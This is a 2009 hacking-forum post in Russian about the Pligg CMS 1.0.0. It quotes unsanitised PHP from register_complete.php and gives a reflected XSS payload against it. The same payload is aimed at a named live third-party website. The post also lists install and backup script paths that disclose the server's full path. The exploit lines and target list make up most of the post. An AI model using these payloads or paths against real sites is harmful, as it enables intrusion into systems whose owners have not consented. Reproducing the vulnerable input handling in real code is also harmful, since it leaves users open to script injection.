29.06.2009, 18:50
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
AFoST, в версии 1.0.0. все Blind'и не работают)
т.е. разработчики добавили ф-цию "антихак" sanitize(, и теперь код уже выглядит уже так%
PHP код:
$requestID = sanitize($_REQUEST['id'], 3);
$requestTitle = sanitize($_REQUEST['title'], 3);
$requestURL = sanitize($_REQUEST['url'], 3);
Pligg 1.0.0
pXSS
/register_complete.php
PHP код:
$user=$_GET['user'];
$usr = new User();
$usr->username = $user;
if ($usr->read()){
$email = $usr->email;
}
exploit:
Код:
/register_complete.php?user=a<script>alert(/xss/);</script>
example:
Код:
http://www.gossipsnipper.com/register_complete.php?user=a<script>alert(/xss/);</script>
Full path disclosure
Код:
/install/header.php
/install/install0.php
/install/troubleshooter.php
/install/install1.php
/install/menu.php
/libs/backup/mysql_backup/backup.php
/libs/backup/mysql_backup/init.php
Последний раз редактировалось eLWAux; 29.06.2009 в 19:19..
|
|
|